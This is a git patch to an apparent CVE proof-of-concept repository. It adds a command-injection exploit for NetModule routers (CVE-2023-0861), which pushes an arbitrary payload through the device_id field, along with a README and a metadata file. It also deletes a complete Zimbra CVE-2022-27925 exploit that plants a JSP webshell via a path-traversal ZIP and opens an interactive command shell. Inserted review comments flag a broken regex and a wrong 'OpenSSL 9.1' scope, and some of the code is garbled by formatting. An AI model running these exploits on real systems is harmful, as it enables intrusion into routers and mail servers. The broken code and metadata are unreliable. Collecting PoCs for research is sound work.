From 8b1dc5bc6f2f0b0179cbcacc34422456acddbb4d Mon Sep 17 00:00:00 2001
From: "1802669805@qq.com" <1802669805@qq.com>
Date: Thu, 23 Mar 2023 17:45:14 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0861?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../2023/CVE-2023-0861/PoC-CVE-2023-0861.py | 31 ++++
 cve/NetModule/2023/CVE-2023-0861/README.md | 9 ++
 cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 22 +++
 cve/Zimbra/2022/CVE-2022-27925/exploit.py | 144 ------------------
 ...E-2019-12735.yaml => CVE-2019-12735.yaml} | 0
 openkylin_list.yaml | 2 +
 6 files changed, 64 insertions(+), 144 deletions(-)
 create mode 100644 cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
 create mode 100644 cve/NetModule/2023/CVE-2023-0861/README.md
 create mode 100644 cve/NetModule/2023/yaml/CVE-2023-0861.yaml
 delete mode 100644 cve/Zimbra/2022/CVE-2022-27925/exploit.py
 rename cve/vim/2019/yaml/{CVE-2019-12735.yaml => CVE-2019-12735.yaml} (100%)
diff --git a/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
new file mode 100644
index 00000000..28a9172b
--- /dev/null
+++ b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
@@ -0,0 +1,31 @@
+import re
+import requests
+import argparse
+import urllib.parse
+
+
+parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC')
+parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router')
+parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication')
+parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload')
+args = parser.parse_args()
+
+url = f'{args.url}/admin/gnss.php'
+c = {'PHPSESSID':args.phpsessid}
+response = requests.get(url,cookies=c)
+csrf_token = re.search(r'', response.text).group(1)
+#print(csrf_token)
+data = {
+'toggleAlignment': 'test',
+'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2',
+'csrf-token': csrf_token,
+}
+#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2')
+url = f'{args.url}/admin/gnssAutoAlign.php'
+
+response = requests.post(url, data=data,cookies=c)
+
+if response.status_code == 200:
+ results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c)
+ #print('done!')
+ print(results.content.decode())
\ No newline at end of file
diff --git a/cve/NetModule/2023/CVE-2023-0861/README.md b/cve/NetModule/2023/CVE-2023-0861/README.md
new file mode 100644
index 00000000..9024e8db
--- /dev/null
+++ b/cve/NetModule/2023/CVE-2023-0861/README.md
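Review bot: `csrf_token = re.search(r'', response.text).group(1)` cannot succeed as written: an empty pattern has no capture group, so `.group(1)` raises IndexError on every run, and the pattern has presumably lost its markup in this rendering of the patch, so the committed file should be checked to confirm the regex and its group are intact. Even with a correct pattern, `re.search` returns None whenever the page carries no token (expired or non-admin session, wrong host), which surfaces as an AttributeError instead of a usable message; bind the match first and exit cleanly, e.g. `m = re.search(CSRF_PATTERN, response.text)` / `if m is None: raise SystemExit('csrf token not found in /admin/gnss.php')` (CSRF_PATTERN is a placeholder for the real expression). `urllib.parse` is imported but only referenced inside a commented-out print and can be dropped. The script also has no `if __name__ == '__main__':` guard and performs every request at import time, which is worth fixing if the repository's other PoCs follow that convention.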
@@ -0,0 +1,9 @@
+### Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers
+
+NetModule is an Original Equipment Manufacturer (OEM) of industrial grade routers that are commonly used in critical
+infrastructure and industrial control systems. On February 24th, 2023, ONEKEY, a security research firm, released a security
+advisory disclosing a vulnerability that affect 9 NetModule routers. The vulnerability were identified within the web
+management interface and allow authenticated users to execute arbitrary commands with elevated privileges.
+As an individual interested in IoT security and firmware analysis, I find it valuable to review the entire reproduction process of
+reported vulnerabilities and In the pursuit of expanding my knowledge and skills, I took it upon myself to reproduce the
+disclosed vulnerability.
diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
new file mode 100644
index 00000000..5769a5e7
--- /dev/null
+++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
@@ -0,0 +1,22 @@
+id: CVE-2023-0861
+source:
+https://github.com/seifallahhomrani1/CVE-2023-0861-POC
+info:
+name: ONetModule NSRW是NetModule公司的一系列路由器软件。
+NetModule NSRW存在安全漏洞,该漏洞源于执行由未经过滤的用户输入构建的操作系统命令,经过身份验证的攻击者利用该漏洞可以执行任意命令。
+severity: HIGH
+description: |
+NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。
+scope-of-influence:
+OpenSSL 9.1
+reference:
+- https://nvd.nist.gov/vuln/detail/CVE-2023-0861
+- https://avd.aliyun.com/detail?id=AVD-2023-0861
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 8.8
+cve-id: CVE-2023-0861
+cwe-id: CWE-78
+cnvd-id: None
+kve-id: None
+tags: cve2023
\ No newline at end of file
diff --git a/cve/Zimbra/2022/CVE-2022-27925/exploit.py b/cve/Zimbra/2022/CVE-2022-27925/exploit.py
deleted file mode 100644
index 3a952699..00000000
--- a/cve/Zimbra/2022/CVE-2022-27925/exploit.py
+++ /dev/null
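Review bot: `scope-of-influence:` lists `OpenSSL 9.1`, which does not belong in a record whose `name`, `description` and `cwe-id: CWE-78` all describe the NetModule NSRW web management interface; the value looks carried over from another entry and should be replaced with the affected NetModule NSRW versions taken from the referenced advisory (`<AFFECTED_NSRW_VERSIONS>` as a placeholder until confirmed), since anyone using this index to scope exposure will otherwise match the wrong product. `name:` starts with `ONetModule`, a typo for `NetModule`, and the line that follows it (`NetModule NSRW存在安全漏洞...`) reads as description text rather than a product name; whether YAML treats it as a continuation of the `name` scalar or as a parse error depends on indentation that this rendering has collapsed, so the file should be loaded once to confirm it parses. The `description: |` block scalar likewise needs its content line indented relative to the key to be valid.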
@@ -1,144 +0,0 @@ -import argparse -import zipfile -import io -import random -import string -import requests -from urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%>
<%if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + ""); Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd")); } else{ p = Runtime.getRuntime().exec(request.getParameter("cmd")); } OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>' -char_set = string.ascii_uppercase + string.digits -webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp' -#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"] -BLUE = "\033[1;34m" -CYAN = "\033[1;36m" -GREEN = "\033[0;32m" -RED = "\033[31m" - -ITERATE = False - - -def banner(): - return CYAN+''' - _____ _ __ -/__ / (_)___ ___ / /_ _________ _ - / / / / __ `__ \/ __ \/ ___/ __ `/ - / /__/ / / / / / / /_/ / / / /_/ / -/____/_/_/ /_/ /_/_.___/_/ \__,_/ - CVE-2022-27925 - ''' - -# FIX URL -def fix_url(url): - if not url.startswith('https://'): - url = 'https://' + url - url = url.rstrip("/") - return url - -def build_zip(jsp, path): - zip_buffer = io.BytesIO() - zf = zipfile.ZipFile(zip_buffer, 'w') - zf.writestr(path, jsp) - zf.close() - return zip_buffer.getvalue() - -def exploit(host, payload, cmd): - headers = {'content-Type': 'application/x-www-form-urlencoded'} - try: - r = requests.post( - host + '', data=payload, headers=headers, verify=False, timeout=20) - r = requests.post( - host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20) - print(GREEN + '[!] 
Testing webshell') - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=' + cmd, verify=False, timeout=20) - if "Josexv1" in r.text: - print(CYAN + '[+] Webshell works!!') - print(GREEN + '[+] WebShell location: ' + - host + '/zimbraAdmin/' + webshell_name + "") - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=uname+-a' , verify=False, timeout=20) - print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('') - [1].split('')[0].strip()) - return True - else: - print(RED + '[-] Target not vulnerable') - return False - except: - print(RED + '[!] Connection error') - -def ping_url(url): - try: - r = requests.get(url, verify=False, timeout=10) - if r.status_code == 200: - print(CYAN + '[!] Target is up!') - return True - else: - print(RED + '[!] Target is down! Next >> \n') - return False - except: - return False - -def main(url): - paths = [ - '../../../../mailboxd/webapps/zimbraAdmin/', - '../../../../jetty_base/webapps/zimbraAdmin/', - '../../../../jetty/webapps/zimbraAdmin/'] - work = 0 - try: - for num in range(0, 3): - print( - GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num]) - zippedfile = build_zip(webshell_payload, paths[num]+webshell_name) - print(GREEN + '[!] Exploiting!') - if exploit(url, zippedfile, 'echo "Josexv1"'): - if args.target: - answer = input( - CYAN + '[+] Want to interact with webshell via terminal? (y/n): ') - if answer == "y": - print(GREEN + '[!] Sending commands to: ' + - url + '/zimbraAdmin/' + webshell_name) - while True: - cmd = input(GREEN + "[+] $ > " + BLUE) - if cmd == "exit": - break - req = requests.get( - url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20) - try: - print(CYAN + req.text.split('') - [1].split('')[0].strip()) - except: - print(RED + "[!] Error ?") - else: - print(RED + '[!] Bye!') - exit() - except: - print(RED + '[!] 
URL Error') - ITERATE = True - -if __name__ == "__main__": - print(banner()) - parser = argparse.ArgumentParser() - parser.add_argument( - '-t', '--target', help='URl with protocol HTTPS', default=False) - parser.add_argument("-l", "--list", action="store", - help="List of targets", default=False) - args = parser.parse_args() - if args.target is not False: - url = fix_url(args.target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - elif args.list is not False: - with open(args.list, "rb") as targets: - for target in targets: - target = target.rstrip().decode("utf-8") - url = fix_url(target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - else: - parser.print_help() - parser.exit() diff --git a/cve/vim/2019/yaml/CVE-2019-12735.yaml b/cve/vim/2019/yaml/CVE-2019-12735.yaml similarity index 100% rename from cve/vim/2019/yaml/CVE-2019-12735.yaml rename to cve/vim/2019/yaml/CVE-2019-12735.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index e348ad07..c944d8e2 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -137,6 +137,8 @@ cve: - CVE-2022-31692 Zimbra: - CVE-2022-27925 + NetModule: + - CVE-2023-0861 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee